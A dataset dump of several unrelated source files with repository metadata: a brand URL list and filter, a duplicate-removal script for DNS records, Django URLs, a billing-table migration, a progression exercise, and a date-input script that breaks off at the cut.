{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=21', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=22', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=23', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/282', 'brand': u'MTC'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/153', 'brand': u'Nabi'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/42', 'brand': u'NEC'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/341', 'brand': u'Nexbit'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/342', 'brand': u'Nextbit'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/242', 'brand': u'Nextbook'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/108', 'brand': u'Nextel'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/332', 'brand': u'Ninetology'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/344', 'brand': u'NIU'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/340', 'brand': u'No. 1'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=1', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=2', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=3', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=4', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=5', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=6', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=7', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=8', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=9', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=10', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=11', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=12', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=13', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=14', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=15', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=16', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=17', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=18', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=19', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=20', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=21', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=22', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/303', 'brand': u'NuVision'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/243', 'brand': u'NVIDIA'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/217', 'brand': u'OnePlus'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/322', 'brand': u'Oppo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/49?&p=1', 'brand': u'Palm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/49?&p=2', 'brand': u'Palm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/50', 'brand': u'Panasonic'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/51', 'brand': u'Pandigital'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/52?&p=1', 'brand': u'Pantech'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/52?&p=2', 'brand': u'Pantech'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/52?&p=3', 'brand': u'Pantech'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/266', 'brand': u'Parla'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/154', 'brand': u'PCD'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/100', 'brand': u'Philips'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/319', 'brand': u'Pipo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/134', 'brand': u'Plantronics'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/196', 'brand': u'Plum'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/346', 'brand': u'PNR'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/156', 'brand': u'Polaroid'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/193', 'brand': u'Posh'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/244', 'brand': u'Pyle'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/257', 'brand': u'Qtek'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/53?&p=1', 'brand': u'Qualcomm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/53?&p=2', 'brand': u'Qualcomm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/53?&p=3', 'brand': u'Qualcomm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/355', 'brand': u'Quanta'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/205', 'brand': u'RCA'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/208', 'brand': u'Revel'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/213', 'brand': u'Riv'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/359', 'brand': u'Roam Mobility'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/113', 'brand': u'SAGEM'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=1', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=2', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=3', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=4', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=5', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=6', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=7', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=8', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=9', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=10', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=11', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=12', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=13', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=14', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=15', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=16', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=17', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=18', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=19', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=20', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=21', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=22', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=23', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=24', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=25', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=26', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=27', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=28', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=29', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=30', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=31', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=32', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=33', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=34', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=35', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=36', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=37', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=38', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=39', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=40', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=41', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=42', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=43', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=44', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=45', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=46', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=47', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=48', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=49', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=50', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=51', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/56?&p=1', 'brand': u'Sanyo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/56?&p=2', 'brand': u'Sanyo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/56?&p=3', 'brand': u'Sanyo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/351', 'brand': u'SFR'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/58?&p=1', 'brand': u'Sharp'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/58?&p=2', 'brand': u'Sharp'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/393', 'brand': u'Sho'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/59?&p=1', 'brand': u'Siemens'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/59?&p=2', 'brand': u'Siemens'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/59?&p=3', 'brand': u'Siemens'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/281', 'brand': u'SKK Mobile'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/336', 'brand': u'SKY'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/254', 'brand': u'skytex'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/270', 'brand': u'Smartab'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/304', 'brand': u'Social'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/117', 'brand': u'Sonim'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=1', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=2', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=3', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=4', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=5', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=6', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=1', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=2', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=3', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=4', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=5', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=6', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=7', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=8', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=9', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/65', 'brand': u'Sprint'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/343', 'brand': u'Star'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/255', 'brand': u'sungale'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/245', 'brand': u'Supersonic'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/380', 'brand': u'SVP'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/204', 'brand': u'Sylvania'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/66', 'brand': u'Symbol'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/384', 'brand': u'TAG'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/267', 'brand': u'TCL Communication'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/328', 'brand': u'Tecno'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/356', 'brand': u'Telenor'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/290', 'brand': u'Tengda'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/334', 'brand': u'THL'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/246', 'brand': u'Tivax'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/68', 'brand': u'T-Mobile'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/69', 'brand': u'Toshiba'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/306', 'brand': u'TRUCONNECT'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/198', 'brand': u'UMX'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/150', 'brand': u'Uniden'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/367', 'brand': u'Uniscope'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/199', 'brand': u'Unnecto'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/365', 'brand': u'Uno'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/70?&p=1', 'brand': u'UTStarcom'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/70?&p=2', 'brand': u'UTStarcom'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/247', 'brand': u'Velocity Micro'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/71', 'brand': u'Verizon'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/216', 'brand': u'Verykool'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/339', 'brand': u'Videocon'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/248', 'brand': u'Viewsonic'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/249', 'brand': u'Visual Land'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/250', 'brand': u'Vivitar'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/335', 'brand': u'Vivo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/160', 'brand': u'Vizio'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/114', 'brand': u'VK Mobile'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/330', 'brand': u'Vodafone'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/392', 'brand': u'Vogue'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/374', 'brand': u'Vortex'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/251', 'brand': u'Vulcan'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/325', 'brand': u'Wiko'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/252', 'brand': u'Wintec'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/323', 'brand': u'Worldphone'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/289', 'brand': u'Xiaocai'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/320', 'brand': u'Xiaomi'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/318', 'brand': u'Xolo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/371', 'brand': u'XOM'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/381', 'brand': u'XOX'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/218', 'brand': u'Yezz'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/326', 'brand': u'YU'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/253', 'brand': u'Zeki'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/395', 'brand': u'Zhem'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/207', 'brand': u'Zipit'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=1', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=2', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=3', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=4', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=5', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=6', 'brand': u'ZTE'}]
nameUsed = [
"Apple",
"BlackBerry",
"Google",
"HTC",
"Huawei",
"LG",
"Motorola",
"Nokia",
"Samsung",
"Sony"
]
nameIn = list(set([one['brand'] for one in brandDict]))
for name in nameUsed:
if name in nameIn:
print '{} is in.'.format(name)
else:
print '{} is not in.'.format(name)
brandDictFiltered = filter(lambda x: x['brand'] in nameUsed, brandDict) | UTF-8 | Python | false | false | 38,761 | py | 70 | nameScript.py | 61 | 0.663605 | 0.628493 | 0 | 454 | 84.378855 | 111 |
xixi2/mal_domain_detection | 12,446,815,239,780 | 270a5fe0d3e0142f0be44e12dc77003024e137df | b5c3b8c1f8888d9acfe5a99ed4b6b786e45e468d | /active_node/remove_duplicate.py | bc251e519a814bb0e0a8b849a538c540005712a6 | []
| no_license | https://github.com/xixi2/mal_domain_detection | c6b1bb8a84ee7e8e54ea2e9f991e4e5a2ac54f33 | 84c2c853d1c5df183e6f8fdea464ebbed20cb41a | refs/heads/master | 2020-04-26T02:12:51.891086 | 2019-05-20T03:41:14 | 2019-05-20T03:41:14 | 173,228,166 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
from common.database_op import connect_db, query_db, delete_db
conn = connect_db()
def remove_double():
    """Finds duplicated (domain_name, ip) rows, keeping the smallest id of each group."""
    sql = "select DISTINCT(domain_name) from dns_answer"
    res = query_db(conn, sql)
    affected_ids = []
    for item in res:
        domain = item[0]
        # The query keeps MIN(id) for each (domain_name, ip) pair and returns
        # every other id as a removable duplicate.
        sql = 'select id from (select id from dns_answer where domain_name = "{0}" and ip in ' \
              '(SELECT ip FROM dns_answer where domain_name = "{0}" group by ip having count(*) >=1)) ta ' \
              'where id != (select MIN(id) from dns_answer where domain_name = "{0}" and ip in ' \
              '(SELECT ip FROM dns_answer where domain_name = "{0}" group by ip having count(*) >1))'\
            .format(domain)
        dup_rows = query_db(conn, sql)
        if len(dup_rows) == 0:
            continue
        duplicate_ids = [int(row[0]) for row in dup_rows]
        print("domain: %s, duplicate_ids: %s" % (domain, duplicate_ids))
        affected_ids.extend(duplicate_ids)
    return affected_ids
if __name__ == "__main__":
affected_ids = remove_double()
if len(affected_ids) > 0:
del_sql = "delete from dns_answer where id in ("
for index, affected_id in enumerate(affected_ids):
if index == 0:
del_sql += "%s" % (affected_id,)
else:
del_sql += ", %s" % (affected_id)
del_sql += ")"
print(del_sql)
delete_db(conn, del_sql)
conn.close() | UTF-8 | Python | false | false | 1,463 | py | 70 | remove_duplicate.py | 39 | 0.546822 | 0.539303 | 0 | 40 | 35.6 | 108 |
Raghav-Sao/Places | 13,469,017,455,081 | b8c3a0d66b4ca304d2adb0016d2c132f1622b397 | e04dbf0a3fd4caee19161ed4c65c8eb4ba78db09 | /places/urls.py | c7fcc030f3e8a210dfe8c26aba67d07a2ce4df70 | []
| no_license | https://github.com/Raghav-Sao/Places | 76633d73d5ce8fabe32ef0d2a07387ddadd13894 | ad815681944278b6eaa72e6991788d654f051404 | refs/heads/master | 2021-01-19T02:39:09.264944 | 2016-07-15T07:44:05 | 2016-07-15T07:44:05 | 62,582,934 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf.urls import include, url
import views
urlpatterns = [
url('add-place', views.add_place, name="add-place"),
url(r'^(?P<place_id>[0-9]+)/$', views.place_details, name="place-details"),
url('^$', views.places, name="places"),
] | UTF-8 | Python | false | false | 251 | py | 6 | urls.py | 6 | 0.649402 | 0.641434 | 0 | 8 | 30.5 | 79 |
sand8080/helixbilling | 1,743,756,764,272 | dd276bb1a4e7ac1658be41ef1ce996e5f1a176ca | b52ac748b10f003301fd53499a71a584f6ef27db | /src/patches/4.py | 637775dea0679cf2f4538aada4503801ef81c0d8 | []
| no_license | https://github.com/sand8080/helixbilling | 2ff8bb0bdb67d19920b04f4435c4cbc412d3eb16 | 17e2c61bab8be8299d9ea2c4ef84a0789b2d5a5a | refs/heads/master | 2016-09-06T11:16:10.565134 | 2012-07-13T13:39:49 | 2012-07-13T13:41:40 | 1,605,061 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def apply(curs):
print 'Creating table balance'
curs.execute(
'''
CREATE TABLE balance (
id serial,
PRIMARY KEY(id),
environment_id integer NOT NULL,
is_active boolean NOT NULL DEFAULT True,
user_id integer NOT NULL,
currency_id int NOT NULL,
FOREIGN KEY(currency_id) REFERENCES currency(id),
real_amount NUMERIC DEFAULT 0,
virtual_amount NUMERIC DEFAULT 0,
locked_amount NUMERIC DEFAULT 0,
overdraft_limit NUMERIC DEFAULT 0
)
''')
print 'Creating index balance_environment_id_idx on balance'
curs.execute(
'''
CREATE INDEX balance_environment_id_idx ON balance(environment_id)
''')
print 'Creating index balance_environment_id_user_id_idx on balance'
curs.execute(
'''
CREATE INDEX balance_environment_id_user_id_idx ON balance(environment_id, user_id)
''')
print 'Creating unique index balance_environment_id_user_id_currency_id_idx on balance'
curs.execute(
'''
CREATE UNIQUE INDEX balance_environment_id_user_id_currency_id_idx ON
balance(environment_id, user_id, currency_id)
''')
def revert(curs):
print 'Dropping index balance_environment_id_idx on balance'
curs.execute('DROP INDEX IF EXISTS balance_environment_id_idx')
print 'Dropping index balance_environment_id_user_id_idx on balance'
curs.execute('DROP INDEX IF EXISTS balance_environment_id_user_id_idx')
print 'Dropping unique index balance_environment_id_user_id_currency_id_idx on balance'
curs.execute('DROP INDEX IF EXISTS balance_environment_id_user_id_currency_id_idx')
print 'Dropping table balance'
curs.execute('DROP TABLE IF EXISTS balance')
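# A hedged usage sketch (not part of the original patch module): helixbilling's
# migration runner normally supplies the cursor, and the DSN below is an
# illustrative assumption.
#
#     import psycopg2
#     conn = psycopg2.connect('dbname=helixbilling')
#     apply(conn.cursor())
#     conn.commit()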
| UTF-8 | Python | false | false | 1,807 | py | 39 | 4.py | 35 | 0.65855 | 0.656336 | 0 | 51 | 34.411765 | 91 |
yofn/pyacm | 755,914,289,108 | a51a259899cbd8338b5217a6a03b5618c4a177ab | a4456d808b4c72574a11c88282920a917b076f5b | /codeforces/matrix矩阵/1900/222E基因编码.py | 5dd4c560f30d353f348cca03966c4d80da017bf2 | [
"Apache-2.0"
]
| permissive | https://github.com/yofn/pyacm | 635f3b17cc08d9e702b561f9582fec4d694458b1 | e573f8fdeea77513711f00c42f128795cbba65a6 | refs/heads/master | 2023-07-09T02:11:31.044020 | 2021-08-10T02:02:24 | 2021-08-10T02:02:24 | 270,663,600 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
#https://codeforces.com/problemset/problem/222/E
q = int(1e9)+7
mul=lambda A,B,r:[[sum([(A[i][k]*B[k][j])%q for k in r]) for j in r] for i in r]
def binpower(A,e):
r = range(len(A))
B = A
e -= 1
while True:
if e &1: B = mul(B,A,r)
e =e>>1
if e==0: break
A =mul(A,A,r)
return B
c2i = lambda c: ord(c)-ord('a') if c.islower() else ord(c)-ord('A')+26
def f(l1,l2):
n,m,_ = l1
if n==1: return m
M = [[1]*m for _ in range(m)]
for s in l2:
i = c2i(s[0])
j = c2i(s[1])
M[i][j]=0
return sum([sum(l) for l in binpower(M,n-1)])
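# Transfer-matrix view: M[i][j] = 1 iff symbol j may follow symbol i, so the
# number of admissible strings of length n equals the sum of all entries of
# M^(n-1), taken modulo 1e9+7.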
l1 = list(map(int,input().split()))
l2 = [input() for _ in range(l1[2])]
print(f(l1,l2)%q)
| UTF-8 | Python | false | false | 742 | py | 712 | 222E基因编码.py | 703 | 0.491914 | 0.448787 | 0 | 32 | 22.15625 | 80 |
Claayton/ExerciciosPython | 14,250,701,492,780 | 7647ab5aa96186ff744481a8398c4877840e3dbe | 69e828d2675c0d677daf2b98ed49367fa4c4a68b | /reworked exercices/ex061.2.py | 27d118338b33dece54c31682cb77e683382b5854 | [
"MIT"
]
| permissive | https://github.com/Claayton/ExerciciosPython | 42f9978fffdb350799c1e6756bbfcf1f9f82bd6c | 696cdb16983638418bd0d0d4fe44dc72662b9c97 | refs/heads/master | 2023-03-08T03:21:25.364757 | 2021-08-04T15:07:20 | 2021-08-04T15:07:20 | 331,656,108 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Ex061.2
"""Redo challenge 061, reading the first term and the ratio of an PA
Showing the first 10 terms of the progression using the while function."""
cont = 0
pa = 0
print(f'\033[7:40m{"="}\033[m' * 40)
print(f'{"10 TERMS OF A PA":^40}')
print(f'\033[7:40m{"="}\033[m' * 40)
first = int(input('What is the first term of a PA?: '))
ratio = int(input('What is the ratio of a PA?: '))
while cont < 10:
cont += 1
if cont == 1:
pa = first
print(pa, end=' \033[32m> \033[m')
pa += ratio
print('TheEnd')
print(f'\033[7:40m{"="}\033[m' * 40)
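# Example run (hedged): entering first term 5 and ratio 3 prints
# 5 > 8 > 11 > 14 > 17 > 20 > 23 > 26 > 29 > 32 > TheEnd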
| UTF-8 | Python | false | false | 562 | py | 253 | ex061.2.py | 250 | 0.601423 | 0.494662 | 0 | 19 | 28.578947 | 74 |
WitalyK/CHA | 10,093,173,183,364 | 22be173e34ead61935a747c6aa534f89176f19fd | ec261cffed94d54c1c8f0140ed046d2d24b21e8f | /92/Click_me_NEW.py | fc13be301fd30a8128029522a839dfb937ba6cc2 | []
| no_license | https://github.com/WitalyK/CHA | 7dd51e82b07a6c9cdee08ff7a1625b9976c24ecd | ce20d2501c2174dfde1be2320ccc459262fcf09c | refs/heads/master | 2020-09-08T01:43:23.845841 | 2020-03-02T06:14:28 | 2020-03-02T06:14:28 | 220,974,443 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from re import finditer
from shutil import copy
from subprocess import run, PIPE
d_corr = False
zag = '''wait operator 0 * * * * *
wait operator 0
'''
while not d_corr:
    d = input('Enter the date of the required played-out playlist in the format DD.MM.YYYY: ')
dd = [num for num in d.split('.') if num.isdigit()]
if len(dd)==3:
if len(dd[2])==4 and len(dd[1])==2 and len(dd[0])==2:
try:
d1 = datetime(int(dd[2]), int(dd[1]), int(dd[0])) + timedelta(days=1)
d1 = "{:%d:%m:%Y}".format(d1)
d_corr = True
except ValueError:
d_corr = False
